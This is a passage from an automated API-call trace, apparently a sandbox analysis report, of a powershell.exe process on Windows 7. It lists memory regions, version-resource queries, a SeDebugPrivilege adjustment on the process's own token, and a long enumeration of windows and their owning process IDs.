end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 3571 start_va = 0x5400000 end_va = 0x5d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 3572 start_va = 0x5ee0000 end_va = 0x5f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ee0000" filename = "" Region: id = 3573 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3a0000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Region: id = 3574 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 3587 start_va = 0x5270000 end_va = 0x527ffff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3588 start_va = 0x5d90000 end_va = 0x5e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d90000" filename = "" Region: id = 3591 start_va = 0x74a00000 end_va = 0x74a08fff entry_point = 0x74a00000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 156 os_tid = 0xb68 [0129.651] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0129.763] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.763] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.763] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0129.763] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0130.311] GetVersionExW (in: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.311] GetLastError () returned 0x2 [0130.312] GetVersionExW (in: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.312] GetLastError () returned 0x2 [0130.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de74c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.316] GetLastError () returned 0x2 [0130.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.320] GetLastError () returned 0x2 [0130.320] GetVersionExW (in: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3da570*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.320] GetLastError () returned 0x2 [0130.321] SetErrorMode (uMode=0x1) returned 0x1 [0130.322] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x2debe8 | out: lpFileInformation=0x2debe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0130.322] GetLastError () returned 0x2 [0130.322] SetErrorMode (uMode=0x1) returned 0x1 [0130.323] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x2dec6c | out: lpdwHandle=0x2dec6c) returned 0x94c [0130.325] GetLastError () returned 0x0 [0130.325] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bd4d8c | out: lpData=0x2bd4d8c) returned 1 [0130.328] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2dec38, puLen=0x2dec34 | out: lplpBuffer=0x2dec38*=0x2bd4e28, puLen=0x2dec34) returned 1 [0130.329] lstrlenW (lpString="䅁") returned 1 [0130.335] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd4f04, puLen=0x2debb0) returned 1 [0130.335] lstrlenW (lpString="Microsoft Corporation") returned 21 [0130.336] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0130.336] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd4f58, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="System.Management.Automation") returned 28 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd4fb4, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd4ff4, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd505c, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd50f8, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd515c, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd51d8, puLen=0x2debb0) returned 1 [0130.337] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.337] lstrcpyW (in: lpString1=0x3da558, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.337] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x2bd4e80, puLen=0x2debb0) returned 1 [0130.338] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0130.338] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0130.338] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x0, puLen=0x2debb0) returned 0 [0130.338] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x0, puLen=0x2debb0) returned 0 [0130.338] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x2debb4, puLen=0x2debb0 | out: lplpBuffer=0x2debb4*=0x0, puLen=0x2debb0) returned 0 [0130.338] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2deba8, puLen=0x2deba4 | out: lplpBuffer=0x2deba8*=0x2bd4e28, puLen=0x2deba4) returned 1 [0130.339] VerLanguageNameW (in: wLang=0x0, szLang=0x3da558, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0130.340] VerQueryValueW (in: pBlock=0x2bd4d8c, lpSubBlock="\\", lplpBuffer=0x2debbc, puLen=0x2debb8 | out: lplpBuffer=0x2debbc*=0x2bd4db4, puLen=0x2debb8) returned 1 [0130.343] GetCurrentProcessId () returned 0xb50 [0130.355] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x2de3f4 | out: lpLuid=0x2de3f4*(LowPart=0x14, HighPart=0)) returned 1 [0130.356] GetLastError () returned 0x0 [0130.357] GetCurrentProcess () returned 0xffffffff [0130.357] GetLastError () returned 0x0 [0130.359] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x2de3f0 | out: TokenHandle=0x2de3f0*=0x304) returned 1 [0130.359] GetLastError () returned 0x0 [0130.361] AdjustTokenPrivileges (in: TokenHandle=0x304, DisableAllPrivileges=0, NewState=0x2bd78cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.361] GetLastError () returned 0x0 [0130.362] CloseHandle (hObject=0x304) returned 1 [0130.362] GetLastError () returned 0x0 [0130.365] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb50) returned 0x304 [0130.365] GetLastError () returned 0x0 [0130.374] EnumProcessModules (in: hProcess=0x304, lphModule=0x2bd7910, cb=0x100, lpcbNeeded=0x2debe4 | out: lphModule=0x2bd7910, lpcbNeeded=0x2debe4) returned 1 [0130.375] GetLastError () returned 0x0 [0130.377] GetModuleInformation (in: hProcess=0x304, hModule=0x221c0000, lpmodinfo=0x2bd7a50, cb=0xc | out: lpmodinfo=0x2bd7a50*(lpBaseOfDll=0x221c0000, SizeOfImage=0x72000, EntryPoint=0x221c7363)) returned 1 [0130.377] GetLastError () returned 0x0 [0130.378] GetModuleBaseNameW (in: hProcess=0x304, hModule=0x221c0000, lpBaseName=0x3d2e10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0130.378] GetLastError () returned 0x0 [0130.379] GetModuleFileNameExW (in: hProcess=0x304, hModule=0x221c0000, lpFilename=0x3d2e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0130.379] GetLastError () returned 0x0 [0130.380] CloseHandle (hObject=0x304) returned 1 [0130.380] GetLastError () returned 0x0 [0130.380] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb50) returned 0x304 [0130.381] GetLastError () returned 0x0 [0130.382] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x2bd6f00 | out: lpExitCode=0x2bd6f00*=0x103) returned 1 [0130.382] GetLastError () returned 0x0 [0130.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bd5278, Length=0x20000, ResultLength=0x2dec2c | out: SystemInformation=0x3bd5278, ResultLength=0x2dec2c*=0xb0c8) returned 0x0 [0130.420] EnumWindows (lpEnumFunc=0x29e3612, lParam=0x0) returned 1 [0130.422] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5fc [0130.422] GetLastError () returned 0x0 [0130.422] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x69c [0130.422] GetLastError () returned 0x0 [0130.422] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.422] GetLastError () returned 0x0 [0130.422] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.422] GetLastError () returned 0x0 [0130.422] GetWindowThreadProcessId (in: hWnd=0x200e2, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.423] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.423] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x5009c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0xb0114, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x6a4 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x6021a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x9b0 [0130.424] GetLastError () returned 0x0 [0130.424] GetWindowThreadProcessId (in: hWnd=0x201c4, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x20214, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x8fc [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x501b2, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x988 [0130.425] GetLastError () returned 0x0 [0130.425] GetWindowThreadProcessId (in: hWnd=0x201cc, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.425] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x890 [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x880 [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x870 [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x860 [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x850 [0130.426] GetLastError () returned 0x0 [0130.426] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x840 [0130.426] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x830 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x820 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x810 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x768 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x364 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x3f0 [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x6bc [0130.427] GetLastError () returned 0x0 [0130.427] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x23c [0130.427] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x578 [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x57c [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4b4 [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x764 [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x120 [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x64c [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x30110, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x1c4 [0130.428] GetLastError () returned 0x0 [0130.428] GetWindowThreadProcessId (in: hWnd=0x20120, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x210 [0130.428] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x9009e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x7f8 [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x20162, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5c0 [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5fc [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5ec [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5fc [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5ec [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5fc [0130.429] GetLastError () returned 0x0 [0130.429] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5c0 [0130.429] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5c0 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x200e4, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x200b8, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x300c4, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x800a2, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.430] GetLastError () returned 0x0 [0130.430] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x594 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x730 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5b8 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x58c [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x550 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.431] GetLastError () returned 0x0 [0130.431] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x528 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x2010a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x614 [0130.432] GetLastError () 